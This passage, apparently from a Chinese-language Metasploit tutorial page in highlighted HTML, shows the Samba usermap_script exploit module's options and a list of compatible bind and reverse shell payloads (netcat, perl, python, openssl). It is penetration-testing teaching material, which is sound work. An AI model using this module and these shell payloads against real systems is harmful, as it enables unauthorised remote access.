class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">listen<\/span> <span class=\"hljs-string\">address<\/span> <span class=\"hljs-string\">(an<\/span> <span class=\"hljs-string\">interface<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">be<\/span> <span class=\"hljs-string\">specified)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LPORT<\/span> <span class=\"hljs-number\">4444 <\/span><span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">listen<\/span> <span class=\"hljs-string\">port<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Exploit target:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Id<\/span> <span class=\"hljs-string\">Name<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">--<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">Automatic<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u4f7f\u7528\u7684<code>payload<\/code>\u662f\u4e00\u4e2a<code>unix<\/code>\u53cd\u5411<code>shell<\/code>\u3002<\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>show payloas<\/code>\u5217\u51fa\u5f53\u524d\u653b\u51fb\u6a21\u5757\u6240\u6709\u53ef\u7528\u7684\u653b\u51fb\u8f7d\u8377\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">show<\/span> <span class=\"hljs-string\">payloads<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Compatible<\/span> <span class=\"hljs-string\">Payloads<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">===================<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_awk<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">AWK)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_busybox_telnetd<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">BusyBox<\/span> <span class=\"hljs-string\">telnetd)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_inetd<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(inetd)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_lua<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Lua)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_netcat<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">netcat)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">6<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_netcat_gaping<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">netcat<\/span> <span class=\"hljs-string\">-e)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">7<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_netcat_gaping_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">netcat<\/span> <span class=\"hljs-string\">-e)<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">8<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_perl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Perl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">9<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_perl_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">perl)<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">10<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_r<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">R)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">11<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_ruby<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">12<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_ruby_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Ruby)<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">13<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_socat_udp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">UDP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">socat)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">14<\/span> <span class=\"hljs-string\">cmd\/unix\/bind_zsh<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Zsh)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">15<\/span> <span class=\"hljs-string\">cmd\/unix\/generic<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command,<\/span> <span class=\"hljs-string\">Generic<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">16<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Double<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(telnet)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">17<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_awk<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">AWK)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">18<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_bash_telnet_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(telnet)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">19<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_ksh<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Ksh)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">20<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_lua<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Lua)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">21<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_ncat_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">ncat)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">22<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_netcat<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">netcat)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">23<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_netcat_gaping<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">netcat<\/span> <span class=\"hljs-string\">-e)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">24<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_openssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Double<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(openssl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">25<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_perl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Perl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">26<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_perl_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">perl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">27<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_php_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">php)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"35\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">28<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_python<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Python)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"36\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">29<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_python_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">python)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"37\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">30<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_r<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">R)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"38\"><\/div>\n<\/div>\n<div 